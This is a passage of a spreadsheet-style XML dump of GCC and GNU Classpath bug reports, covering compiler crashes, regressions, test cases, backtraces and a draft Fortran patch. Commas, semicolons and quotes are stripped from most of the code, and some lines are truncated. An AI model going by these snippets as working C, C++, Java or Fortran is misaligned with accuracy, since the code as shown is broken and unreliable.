         x0: integer
      end record
      procedure p1 (x1: access T1 val: integer)
      x2: aliased constant T1 := (x0 =&gt; 3)
      x3: access constant T1 := x2'access
   end pak3
   package body pak3 is
      procedure p1 (x1: access T1 val: integer) is
      begin
         x1.x0 := val
      end p1
   end pak3
begin
   text_io.put_line(integer'image(pak3.x2.x0))
   pak3.x2.p1(5) -- line 25
   text_io.put_line(integer'image(pak3.x2.x0))
   pak3.x3.all.p1(7) -- line 27
-- pak3.x3.p1(7)       -- this one is detected
   text_io.put_line(integer'image(pak3.x2.x0))
end test1
GCC 4.1.2:
$ gnatmake -gnat05 test1
gcc-4.1 -c -gnat05 test1.adb
test1.adb:25:08: expected an access type with designated type T1 defined at line 5
test1.adb:25:08: found type T1 defined at line 5
test1.adb:27:12: expected an access type with designated type T1 defined at line 5
test1.adb:27:12: found type T1 defined at line 5
The error messages are not very good (they should say something like found type constant T1) but the program is indeed illegal.
GCC 4.2.2:
$ gnatmake -gnat05 test1
gcc-4.2 -c -gnat05 test1.adb
gnatbind -x test1.ali
gnatlink test1.ali
$ ./test1
 3
 5
 7</t>
  </si>
  <si>
    <t>GCC-4504</t>
  </si>
  <si>
    <t>ICE in fixup_var_refs_1 at function.c:1922</t>
  </si>
  <si>
    <t xml:space="preserve">      the following simple code produces following GCC abort when compiled with -fvolatile -O flags
      genkoba.c: In function `second':
      genkoba.c:56: Internal compiler error in fixup_var_refs_1 at function.c:1922
      Please submit a full bug report
The system is a Linux Debian/Sid gcc being the 3.0.1 release (compiled by me) installed in /usr/local/bin/gcc
for your information 
here is the (simple) source code -which generated a simplistic C header file using a line of stars as separator
the genkoba.c file has 56 lines and its md5sum is 27bc1f42742db1faf79f9521ae981a7e
*******************************************************************************************
/* file KOBS/lib/genkoba.c */
/* emacs Time-stamp:  */
#include 
#include 
#include 
#include 
#include 
void first(int a)
void second(int *pa int b int c)
int main(int argc char**argv)
{
  char buf[100]
  char *pc=0
  time_t t=0
  t = time(0)
  puts(#ifndef _KOBAGEN_TIMESTAMP)
  memset(buf 0 sizeof(buf))
  strncpy(buf ctime(
  pc = strchr(buf '\n')
  if (pc) *pc=0
  puts(/*** file _kobagen.h generated by genkoba.c ** DO NOT EDIT **/)
  printf(#define _KOBAGEN_TIMESTAMP \%s\\n buf)
  printf(#define KOBA_SETJMP_SIZE %d /*sizeof(jmp_buf) in bytes*/\n
	 sizeof(jmp_buf))
  first(__LINE__)
  puts(#endif /*_KOBAGEN_TIMESTAMP*/)
  return 0
}
void first(int a)
{
  second(
} 
void second(int *pa int b int c)
{
  int delta = 
  printf(/*pa=%p &amp;b=%p &amp;c=%p &amp;delta=%p delta=%d*/\n 
	 pa 
  if (delta&gt;0) 
    printf(#define KOBA_STACK_UP /*delta=%d*/\n delta)
  else
    printf(#define KOBA_STACK_DOWN /*delta=%d*/\n delta)
  if (&amp;c &gt; &amp;b) 
    printf(#define KOBA_ARGS_TO_LEFT /*delta'=%d sum=%d*/\n 
  else
    printf(#define KOBA_ARGS_TO_RIGHT /*delta'=%d sum=%d*/\n 
}
**************************************************************************************************
Release:
3.0.1 also weekly snapshot version 3.0.2 20011007
Environment:
System: Linux hector.lesours 2.2.19 #2-Reiser Thu Aug 30 22:14:16 CEST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: /usr/src/Lang/gcc-3.0.1/configure --verbose --disable-shared</t>
  </si>
  <si>
    <t>basile</t>
  </si>
  <si>
    <t>GCC-4612</t>
  </si>
  <si>
    <t>ICE in change_address at emit-rtl.c:1635</t>
  </si>
  <si>
    <t xml:space="preserve">	When trying to compile ImageMagick with gcc 3.0.1 I get an ICE
	on the file fits.c.
root@sd-carndt1:src/ImageMagick-5.3.6/coders [74] gcc -v -save-temps -DHAVE_CONFIG_H -I../ -I.. -I../magick -D_REENTRANT -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -I/usr/local/include -I/usr/openwin/include -I/usr/openwin/include/X11 -g -O2 -Wall -c fits.c -Wp-MD.deps/fits.TPlo -o fits.o
Reading specs from /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/specs
Configured with: ./configure
Thread model: posix
gcc version 3.0.1
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/cpp0 -lang-c -v -I../ -I.. -I
../magick -I/usr/local/include -I/usr/openwin/include -I/usr/openwin/include/X11
 -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=1 -Dsparc -Dsun -Dunix -D
__svr4__ -D__SVR4 -D__sparc__ -D__sun__ -D__unix__ -D__svr4__ -D__SVR4 -D__sparc
 -D__sun -D__unix -Asystem=unix -Asystem=svr4 -D__OPTIMIZE__ -D__STDC_HOSTED__=1
 -Wall -D__GCC_NEW_VARARGS__ -Acpu=sparc -Amachine=sparc -DHAVE_CONFIG_H -D_REEN
TRANT -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -MD .deps/fits.TPlo fits.c fits
.i
GNU CPP version 3.0.1 (cpplib) (sparc)
ignoring nonexistent directory /usr/local/sparc-sun-solaris2.8/include
ignoring duplicate directory ..
ignoring duplicate directory /usr/local/include
#include ... search starts here:
#include  search starts here:
 ..
 ../magick
 /usr/local/include
 /usr/openwin/include
 /usr/openwin/include/X11
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/sparc-sun-solaris2.8/3.0.1/cc1 -fpreprocessed fits.i -qu
iet -dumpbase fits.c -g -O2 -Wall -version -o fits.s
GNU CPP version 3.0.1 (cpplib) (sparc)
GNU C version 3.0.1 (sparc-sun-solaris2.8)
        compiled by GNU C version 3.0.1.
fits.c: In function `ReadFITSImage':
fits.c:482: Internal compiler error in change_address at emit-rtl.c:1635
Please submit a full bug report
with preprocessed source if appropriate.
Release:
3.0.1
Environment:
System: SunOS sd-carndt1 5.8 Generic_108528-10 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ./configure</t>
  </si>
  <si>
    <t>carndt</t>
  </si>
  <si>
    <t>GCC-17518</t>
  </si>
  <si>
    <t>[4.0 regression] Incorrect  is used uninitialized warning (-O1 -O2 -O3)</t>
  </si>
  <si>
    <t>% cat x.c
main(int char **) {
  bool b
  if( false )
    if( b ) /* this never shall be reached */
      return -1
}
% gccvs x.c -W -O1
x.c: In function `int main(int char**)':
x.c:4: warning: 'b' is used uninitialized in this function</t>
  </si>
  <si>
    <t>GCC-83671</t>
  </si>
  <si>
    <t>Fix for false positive reported by -Wstringop-overflow does not work at -O1</t>
  </si>
  <si>
    <t>Fix for bug 83373 does not work well with inlining:
[code]
#include 
#include 
char dest[20]
char src[10]
__attribute((nonnull(1 2)))
inline char* my_strcpy(char* __restrict__ dst const char* __restrict__ src size_t size)
{
    size_t len = strlen(src)
    if (len &lt; size)
        memcpy(dst src len + 1)
    else
    {
        memcpy(dst src size - 1)
        dst[size - 1] = '\0'
    }
    return dst
}
inline void func1()
{
    my_strcpy(dest src sizeof(dest))
}
void func2()
{
    func1()
}
[/code]
[out]
$ g++ -c -o test.o test.cc -Wall -Wstringop-overflow=2 -O1
In function â€˜char* my_strcpy(char* const char* size_t)â€™
    inlined from â€˜void func2()â€™ at test.cc:23:14:
test.cc:15:15: warning: â€˜void* memcpy(void* const void* size_t)â€™ forming offset [11 19] is out of the bounds [0 10] of object â€˜srcâ€™ with type â€˜char [10]â€™ [-Warray-bounds]
         memcpy(dst src size - 1)
         ~~~~~~^~~~~~~~~~~~~~~~~~~~
test.cc: In function â€˜void func2()â€™:
test.cc:5:6: note: â€˜srcâ€™ declared here
 char src[10]
      ^~~
In function â€˜char* my_strcpy(char* const char* size_t)â€™
    inlined from â€˜void func2()â€™ at test.cc:23:14:
test.cc:15:15: warning: â€˜void* memcpy(void* const void* size_t)â€™ reading 19 bytes from a region of size 10 [-Wstringop-overflow=]
         memcpy(dst src size - 1)
         ~~~~~~^~~~~~~~~~~~~~~~~~~~
$ gcc --version
gcc (GCC) 8.0.0 20171231 (experimental)
[/out]</t>
  </si>
  <si>
    <t>GCC-13848</t>
  </si>
  <si>
    <t>[4.0 Regression] bootstrap failure - ICE in ada/utils.c</t>
  </si>
  <si>
    <t>Will post a preprocessed testcase.</t>
  </si>
  <si>
    <t>GCC-58967</t>
  </si>
  <si>
    <t>Powerpc -mlra cannot compile quadrature_lib.cc in Spec2006 with -O3 -ffast-math -funroll-loops -m32</t>
  </si>
  <si>
    <t>Created attachment 31138
-save-temps=obj output of the preprocessor of the bug that shows the problem
Subversion id 204267 of the trunk of GCC cannot build the module quadrature_lib.cc in the Spec 2006 dealII benchmark if you use the -O3 -ffast-math -funroll-loops -m32 -mlra options.  If you eliminated the -mlra option it compiles fine.  If you eliminate the -funroll-loops option but keep the -mlra option it works fine.
Here is the traceback:
-bns-&gt; /opt/at7.0/bin/gdb cc1plus
GNU gdb (GDB) 7.6.50.20130722-cvs
Copyright (C) 2013 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as powerpc64-linux.
Type show configuration for configuration details.
For bug reporting instructions please see:
.
Find the GDB manual and other documentation resources online at:
.
For help type help.
Type apropos word to search for commands related to word.
..
Reading symbols from /home/meissner/fsf-build-ppc64/trunk-204267/gcc/cc1plus...done.
Breakpoint 1 at 0x10eb5840: file /home/meissner/fsf-src/trunk-204267/gcc/diagnostic.c line 1182.
Breakpoint 2 at 0x10eb7190: file /home/meissner/fsf-src/trunk-204267/gcc/diagnostic.c line 1123.
Breakpoint 3 at 0x10f29548
Breakpoint 4 at 0x10f295a0
File tree.h will be skipped when stepping.
Successfully loaded GDB hooks for GCC
(gdb) r -O3  -funroll-loops  -mcpu=power7 -ffast-math -quiet -mlra -m32 quadrature_lib.ii 
Starting program: /home/meissner/fsf-build-ppc64/trunk-204267/gcc/cc1plus -O3  -funroll-loops  -mcpu=power7 -ffast-math -quiet -mlra -m32 quadrature_lib.ii
Breakpoint 1 fancy_abort (file=0x10f9edf0 /home/meissner/fsf-src/trunk-204267/gcc/lra.c line=2034 function=0x10f9eba8  check_rtl)
    at /home/meissner/fsf-src/trunk-204267/gcc/diagnostic.c:1182
1182    {
(gdb) up
#1  0x0000000010731660 in check_rtl (final_p=final_p@entry=true) at /home/meissner/fsf-src/trunk-204267/gcc/lra.c:2034
2034                lra_assert (constrain_operands (1))
(gdb) print insn
$1 = (rtx) 0xfffa970f540
(gdb) pr
warning: Expression is not an assignment (and might have no effect)
(insn 405 602 390 22 (set (reg:TF 35 3)
        (mem/u/c:TF (lo_sum:SI (reg:SI 9 9 [443])
                (symbol_ref/u:SI (*.LC10) [flags 0x82])) [64 S16 A128])) quadrature_lib.cc:80 452 {*movtf_internal}
     (nil))
(gdb)</t>
  </si>
  <si>
    <t>CLASSPATH-29853</t>
  </si>
  <si>
    <t>NPE parsing certain plugin.xml files from Eclipse</t>
  </si>
  <si>
    <t>I get a NPE parsing certain plugin.xml files from Eclipse with libgcj from FC-6:
% java PluginXMLHandler 
org.xml.sax.SAXParseException
   at gnu.xml.stream.SAXParser.parse(libgcj.so.7rh)
   at javax.xml.parsers.SAXParser.parse(libgcj.so.7rh)
   at javax.xml.parsers.SAXParser.parse(libgcj.so.7rh)
   at PluginXMLHandler.main(PluginXMLHandler.java:31)
Caused by: java.lang.NullPointerException
   at gnu.xml.dom.DomNode.dispatchEvent(libgcj.so.7rh)
   at gnu.xml.dom.DomAttr.mutating(libgcj.so.7rh)
   at gnu.xml.dom.DomAttr.setNodeValue(libgcj.so.7rh)
   at gnu.xml.dom.DomElement.setAttribute(libgcj.so.7rh)
   at PluginXMLHandler.startElement(PluginXMLHandler.java:44)
   at gnu.xml.stream.SAXParser.parse(libgcj.so.7rh)
   ...3 more
%
I do not get this NPE with Sun's VM:
% jdk1.5.0_09/bin/java PluginXMLHandler
%
I believe this is a problem with Classpath HEAD as well. I will attach a test xml file and small parsing app.</t>
  </si>
  <si>
    <t>GCC-26029</t>
  </si>
  <si>
    <t>[3.4 Regression] Member initialization by constructor parameter object method calls</t>
  </si>
  <si>
    <t>//	Expected output is:
//	i_=1
//	In g++ 3.4.4 under cygwin output is
//	i_=
//	followed by a random integer value
//	(I've seen zero and 97).
//	It appears as though the i_ member is
//	not being initialized.
#include	
struct	B1
{
	B1	(int      i  ):	i_(i    ) { }
	B1	(const B1 &amp;b1):	i_(b1.i_) { }
	int i_
}
struct	B2
{
	B2	(void)                    { }
}
struct	Initializer
{
	B1	b1(void)	const	{	return	B1(1)	}
	B2	b2(void)	const	{	return	B2( )	}
}
struct	D	:	public	B1	public	B2
{
	D	(Initializer init): B1(init.b1()) B2(init.b2()) { }
}
int	main	(void)
{
	Initializer init
	D           d(init)
	std::cout &lt;&lt; i_= &lt;&lt; d.i_ &lt;&lt; std::endl
	return	0
}</t>
  </si>
  <si>
    <t>GCC-61917</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE on valid code at -O3 on x86_64-linux-gnu in vectorizable_reduction at tree-vect-loop.c:4913</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk and gcc 4.9 at -O3 on x86_64-linux-gnu (in both 32-bit and 64-bit modes).
It is a regression from 4.8.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.10.0 20140725 (experimental) [trunk revision 213036] (GCC) 
$ 
$ gcc-trunk -O2 -c small.c
$ gcc-4.8 -O3 -c small.c
$ 
$ gcc-trunk -O3 -c small.c
small.c: In function â€˜fn1â€™:
small.c:4:1: internal compiler error: in vectorizable_reduction at tree-vect-loop.c:4913
 fn1 ()
 ^
0xb8eb3c vectorizable_reduction(gimple_statement_base* gimple_stmt_iterator* gimple_statement_base** _slp_tree*)
	../../gcc-trunk/gcc/tree-vect-loop.c:4913
0xb8144f vect_analyze_stmt(gimple_statement_base* bool* _slp_tree*)
	../../gcc-trunk/gcc/tree-vect-stmts.c:7103
0xb8ccee vect_analyze_loop_operations
	../../gcc-trunk/gcc/tree-vect-loop.c:1505
0xb8ccee vect_analyze_loop_2
	../../gcc-trunk/gcc/tree-vect-loop.c:1766
0xb8ccee vect_analyze_loop(loop*)
	../../gcc-trunk/gcc/tree-vect-loop.c:1864
0xba50cf vectorize_loops()
	../../gcc-trunk/gcc/tree-vectorizer.c:432
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
$ gcc-4.9 -O3 -c small.c
small.c: In function â€˜fn1â€™:
small.c:4:1: internal compiler error: in vectorizable_reduction at tree-vect-loop.c:4907
 fn1 ()
 ^
0x9b6f35 vectorizable_reduction(gimple_statement_base* gimple_stmt_iterator* gimple_statement_base** _slp_tree*)
	../../gcc-4.9.0/gcc/tree-vect-loop.c:4907
0x9a94e8 vect_analyze_stmt(gimple_statement_base* bool* _slp_tree*)
	../../gcc-4.9.0/gcc/tree-vect-stmts.c:7103
0x9b54e6 vect_analyze_loop_operations
	../../gcc-4.9.0/gcc/tree-vect-loop.c:1505
0x9b54e6 vect_analyze_loop_2
	../../gcc-4.9.0/gcc/tree-vect-loop.c:1765
0x9b54e6 vect_analyze_loop(loop*)
	../../gcc-4.9.0/gcc/tree-vect-loop.c:1863
0x9c9f3b vectorize_loops()
	../../gcc-4.9.0/gcc/tree-vectorizer.c:430
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
----------------------------
int a b c d
int
fn1 ()
{
  for ( c c++)
    for (b = 0 b &lt; 2 b++)
      d = a - d
  return d 
}</t>
  </si>
  <si>
    <t>GCC-21022</t>
  </si>
  <si>
    <t>[4.0 only] ICE while compiling GdkFontMetrics.class with stabs debugging</t>
  </si>
  <si>
    <t>I get the following bus error when I compile libgcj with awt support on darwin:
gnu/java/awt/peer/gtk/GdkFontMetrics.java: In class
'gnu.java.awt.peer.gtk.GdkFontMetrics':
gnu/java/awt/peer/gtk/GdkFontMetrics.java: In constructor '(java.awt.Font)':
gnu/java/awt/peer/gtk/GdkFontMetrics.java:0: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The backtrace of in gdb of the error looks like this:
Program received signal EXC_BAD_ACCESS Could not access memory.
fold_convert (type=0x4160c380 arg=0x0) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/fold-const.c:1885
1885      tree orig = TREE_TYPE (arg)
(gdb) bt
#0  fold_convert (type=0x4160c380 arg=0x0) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/fold-const.c:1885
#1  0x002636dc in bit_from_pos (offset=0x2636dc bitpos=0x1f5d18) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/stor-layout.c:538
#2  0x002636dc in bit_from_pos (offset=0x2636dc bitpos=0x1f5d18) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/stor-layout.c:538
#3  0x000f0d0c in dbxout_type (type=0x41640c00 full=0) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/dbxout.c:1406
#4  0x000f033c in dbxout_type (type=0x41640e00 full=1) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/dbxout.c:2102
#5  0x000f2f68 in dbxout_symbol (decl=0x41640f00 local=0) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/dbxout.c:2570
#6  0x00144a84 in debug_flush_symbol_queue () at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/final.c:3825
#7  0x000f3d1c in dbxout_function_decl (decl=0x41643980) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/dbxout.c:3391
#8  0x0028af98 in rest_of_compilation () at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/passes.c:330
#9  0x0005dc7c in execute_pass_list (pass=0x48efd8) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/tree-optimize.c:552
#10 0x0005dff4 in tree_rest_of_compilation (fndecl=0x0) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/tree-optimize.c:695
#11 0x002b85e0 in cgraph_expand_function (node=0x41657a00) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/cgraphunit.c:931
#12 0x002b86d4 in cgraph_assemble_pending_functions () at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/cgraphunit.c:364
#13 0x002b8e44 in cgraph_finalize_function (decl=0x41643980 nested=0 '\0') at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/cgraphunit.c:456
#14 0x00031c90 in end_java_method () at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/java/decl.c:2025
#15 0x0004a8c8 in parse_class_file () at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/java/jcf-parse.c:935
#16 0x0004d14c in java_parse_file (set_yydebug=1096860544) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/java/jcf-parse.c:1288
#17 0x0026a60c in toplev_main (argc=1078961420 argv=0xbffffa40) at
/Volumes/src/gcc/gcc-cvs/gcc/gcc/toplev.c:1000
#18 0x00002754 in _start (argc=25 argv=0xbffff924 envp=0xbffff98c) at
/SourceCache/Csu/Csu-47/crt.c:267
#19 0x8fe1a558 in __dyld__dyld_start ()
(gdb) 
I can reproduce this on 4.0.x branch too. Unfortunately the error is not as easy
to reproduce for others. It requires that you have a gtk installation with
shared libgcc. All in all about half a day or more of compilation work.
Anyway.
The error appears since Tom Tromey checked in findirect-dispatch compilation for
the awt-peer sources around 2005-04-05.
The error does also happen on tiger.
Further analysis has showed if I remove the debug switch -g from the
compilation command I do not get the bus error.
Note darwin still uses stabs as preferred dbg format. I was not able to build a
gcc on darwin with dwarf2 as default. Neither was I able to reproduce the
failure on linuxppc -with-stabs.
Andrew Pinski noted on IRC that it might be a java fe bug. 
For me the question is now how can I continue to debug this error?
The sooner or later (29 of April) the libgcj awt issue will come since then the
new darwin release can really run gtk-awt java based apps.</t>
  </si>
  <si>
    <t>GCC-50313</t>
  </si>
  <si>
    <t>ARM: PIC code references a non-existant label</t>
  </si>
  <si>
    <t>Created attachment 25211
Preprocessed source
Building gmime with GCC 4.6.1 for ARM gives the following error:
michaelh@ursa1:~/linaro/bugs$ gcc -c -O2 -fPIC -save-temps gmime2.i
gmime2.s: Assembler messages:
gmime2.s:1007: Error: can't resolve `.rodata' {.rodata section} - `.LPIC18' {*UND* section}
The assembler is correct - the code references a label which doesn't exist.
The suspicious code is around:
 bl g_hash_table_new(PLT)
 mov sl r0
 add r0 sp #32
 bl g_mime_decode_lwsp(PLT)
 ldr r3 .L146+24
 ldr r1 [sp #4]
 str r3 [sp #16]
 ldr r3 [sp #32]
...
.L146:
...
 .word .LANCHOR0-(.LPIC18+4)
The 'ldr r3 .L146+24' references the offset. The value is spilt to the stack before the normal `add r3 pc` and doesn't seem to be used afterwards.
The work-around is to compile at -O1 or -O3. The fault also exists in gcc-4.6.1. It does not exist in gcc-4.5.3 or trunk r178025.
This is in a Cortex-A9+NEON+Thumb-2 configuration.</t>
  </si>
  <si>
    <t>GCC-53051</t>
  </si>
  <si>
    <t>I/O: Support reading floating-point numbers which use Q for the exponent</t>
  </si>
  <si>
    <t>gfortran supports since GCC 4.6 quadprecision on common hardware. Thus users started to expect that q works for the exponents e.g. 4.0q0. (The q is a vendor extension.)
In 4.7 the q became supported in the source code (with -Wreal-q-constant as warning). Well it seems as if we should to also support q in the library.
Cf. https://groups.google.com/forum/#!topic/comp.lang.fortran/rfDXj9VQRZM
Untested draft patch below.
--- a/libgfortran/io/list_read.c
+++ b/libgfortran/io/list_read.c
@@ -11382 +11384 @@ parse_real (st_parameter_dt *dtp void *buffer int length)
        case 'D':
+       case 'q':
+       case 'Q':
          push_char (dtp 'e')
@@ -14512 +14534 @@ read_real (st_parameter_dt *dtp void * dest int length)
        case 'd':
+       case 'Q':
+       case 'q':
          goto exp1
@@ -15482 +15524 @@ read_real (st_parameter_dt *dtp void * dest int length)
        case 'd':
+       case 'Q'
+       case 'q':
          goto exp1
diff --git a/libgfortran/io/read.c b/libgfortran/io/read.c
index aa41bc7..32c8b32 100644
--- a/libgfortran/io/read.c
+++ b/libgfortran/io/read.c
@@ -10282 +10284 @@ found_digit:
        case 'D':
+       case 'q':
+       case 'Q':
          ++p</t>
  </si>
  <si>
    <t>GCC-3523</t>
  </si>
  <si>
    <t>java.io.LineNumberReader has a buggy reset() method.</t>
  </si>
  <si>
    <t>The implementation of the reset() method in java.io.LineNumberReader passes invalid arguments to the countLines method causing it to index the array out of bounds under certain circumstances.
Release:
gcc version 3.1 20010630 (experimental)
Environment:
i686-pc-linux-gnu configured with: configure --enable-threads=posix --enable-shared --enable-languages=c++java
How-To-Repeat:
Compile this program to bytecode (with javac jikes or gcj) and then run with gij.
import java.io.*
public class CrashLNR {
  public static void main(String[] args)
    throws Exception
  {
    String s = 123456789\n123456789\n1234\n1234\n
    LineNumberReader r = new LineNumberReader(new StringReader(s) 35)
    r.readLine()
    r.readLine()
    r.mark(10)
    r.readLine()
    r.reset() // exception
  }
}</t>
  </si>
  <si>
    <t>jwnimmer</t>
  </si>
  <si>
    <t>GCC-4004</t>
  </si>
  <si>
    <t>Segmentation fault when compiling perl 5.6.1</t>
  </si>
  <si>
    <t>[root@Server perl-5.6.1]# make
`sh  cflags libperl.a perl.o`  perl.c
          CCCMD =  cc -DPERL_CORE -c -fno-strict-aliasing -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64 -O2
perl.c: In function `Perl_moreswitches':
perl.c:2382: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
make: *** [perl.o] Error 1
Release:
gcc-2.96-54
Environment:
Red Hat Linux release 7.0 (Guinness)
Kernel 2.2.16-22
How-To-Repeat:
just type make</t>
  </si>
  <si>
    <t>mayvilked</t>
  </si>
  <si>
    <t>GCC-23297</t>
  </si>
  <si>
    <t>immediate uses hosed after CCP</t>
  </si>
  <si>
    <t>With the attached patch applied immuses get hosed during update_stmt while
propagating in ccp at tree-ssa-propagate.c:1154 (substitute_and_fold calling
mark_new_vars_to_rename).  Testcase:
struct B { int i }
struct C { struct B c[1] }
int e
static struct C b
void
foo (int d)
{
  struct C *x = 
  b.c[0].i = 424242
  /* CCP destroys immuses of d */
  e = x-&gt;c[d].i
}
we just have substituted &amp;b into x and folded it to
D.1618_6 = bD.1612.cD.1610[dD.1613_5].iD.1608
update_stmt on this will remove the immediate use of dD.1613_5
which then DCE happily removes and we ICE in verify_ssa of it.
Just before CCP the trees look like
foo (dD.1613)
{
  struct C * xD.1616
  intD.0 D.1618
  intD.0 d.0D.1617
  # BLOCK 0
  # PRED: ENTRY (fallthru)
  xD.1616_1 = 
  #   SFT.1D.1625_3 = V_MUST_DEF 
  bD.1612.cD.1610[0].iD.1608 = 424242
  dD.1613_5 = dD.1613_4
  #   VUSE 
  D.1618_6 = xD.1616_1-&gt;cD.1610[dD.1613_5].iD.1608
  #   eD.1611_8 = V_MUST_DEF 
  eD.1611 = D.1618_6
  return
  # SUCC: EXIT
}
with a single use of dD.1613_5.</t>
  </si>
  <si>
    <t>GCC-48661</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] wrong-code regression with devirtualization</t>
  </si>
  <si>
    <t>Created attachment 24029
test case
hi -
gcc 4.6 miscompiles the attached code with -O2.
This was observed in the 4.6.0 release and also in
4.6.1 20110415 from svn.  I see it both with x86 and x86_64 targets.
I did not see this problem with gcc 4.5.
Example of compiling and running:
$ g++ -m32 -o y -O2 y.cc
$ ./y
123
134514336
$
I expect it to print `123' on the second line as well.
Here's the generated code for testSetters.
Note that an uninitialized value is being passed to the
second printf() call.
	.cfi_startproc
	subl	$44 %esp
	.cfi_def_cfa_offset 48
	leal	28(%esp) %eax
	movl	$_ZTV6P4Impl+12 20(%esp)
	movl	$_ZTV6P4Impl+36 28(%esp)
	movl	$123 24(%esp)
	movl	%eax (%esp)
	call	_ZTv0_n12_NK6P4Impl2ptEv
	movl	$.LC0 (%esp)
	movl	%eax 4(%esp)
	call	printf
	movl	32(%esp) %eax   this value has not been initialized.
	movl	$.LC0 (%esp)
	movl	%eax 4(%esp)
	call	printf
	addl	$44 %esp
	.cfi_def_cfa_offset 4
	ret
	.cfi_endproc
Interestingly the presence of the testGetters() function is required
to trigger the bug even though it is not called.
Looking at the dumps a difference seems to show up at the
056t.ehdisp stage.
When the code is being miscompiled i see this:
  D.2397_35 = MEM[(const struct P4Impl *)
  D.2396_44 = D.2397_35
  D.2394_30 = D.2396_44
  p.m_pt = D.2394_30
  ...
  D.2297_5 = p.m_pt
  printf (%d\n D.2297_5)
But if i comment out the P4Impl declaration in testGetters()
i instead see this for testSetters():
  D.2384_34 = MEM[(const struct I4Momentum *)
  D.2385_35 = *D.2384_34
  D.2386_36 = OBJ_TYPE_REF(D.2385_35
:
  p.m_pt = D.2386_36
  ...
  D.2267_5 = p.m_pt
  printf (%d\n D.2267_5)
sss</t>
  </si>
  <si>
    <t>GCC-20869</t>
  </si>
  <si>
    <t>EXTERNAL and INTRINSIC cannot be used together</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
EXTERNAL :: NINT
INTRINSIC :: NINT
END</t>
  </si>
  <si>
    <t>GCC-19250</t>
  </si>
  <si>
    <t>minss/maxss SSE insn not generated for -mfpmath=sse</t>
  </si>
  <si>
    <t>This testcase should generate min{sd}s max{sd}s SSE insn. It looks that
min?f max?f pattern is converted to equivalent i387 insn sequence because the
output is expected in FP reg. However the result of min/max should be _moved_
from SSE to FP reg.
Testcase:
float minf(float a float b) {
  return a &lt;= b ? a : b
}
when compiled with 'gcc -O2 -ffast-math -march=pentium4 -mfpmath=sse
-fomit-frame-pointer':
minf:
        subl    $4 %esp
        flds    8(%esp)
        movss   12(%esp) %xmm0
        movss   %xmm0 (%esp)
        flds    (%esp)
        fcomi   %st(1) %st
        fcmovnb %st(1) %st
        fstp    %st(1)
        addl    $4 %esp
        ret
Equivalent code could be something like:
minf:
	subl	$4 %esp
	movss	8(%esp) %xmm0
	minss	%xmm0 12(%esp)
	movss	%xmm0 (%esp)
	flds	(%esp)
	addl	$4 %esp
	ret
Uros.</t>
  </si>
  <si>
    <t>GCC-12894</t>
  </si>
  <si>
    <t>META-INF entries should be incoluded as --resource entries when compiling jars</t>
  </si>
  <si>
    <t>- I can run the application w/JRE 1.4.2
java -cp .activation.jargnumail.jarinetlib.jarjavax-
security.jarjsse.jarsmtp.jar Send
Subject: ?????????????
- When I try to compile the appliaction using GCJ and run it I get an error 
message:
C:\Temp\foo&gt;send
Subject: ?????????????
javax.mail.NoSuchProviderException: No provider for smtp
   at __ZN5javax4mail18MessagingExceptionC1EPN4java4lang6StringEPNS3_9ExceptionE
 (C:\Temp\foo\javax\mail\MessagingException.java:70)
   at __ZN5javax4mail18MessagingExceptionC1EPN4java4lang6StringE (C:\Temp\foo\ja
vax\mail\Flags.java)
   at __ZN5javax4mail23NoSuchProviderExceptionC1EPN4java4lang6StringE (C:\Temp\f
oo\javax\mail\Folder.java)
   at __ZN5javax4mail7Session11getProviderEPN4java4lang6StringE (C:\Temp\foo\jav
ax\mail\Session.java:464)
   at __ZN5javax4mail7Session12getTransportEPNS0_7URLNameE (C:\Temp\foo\javax\ma
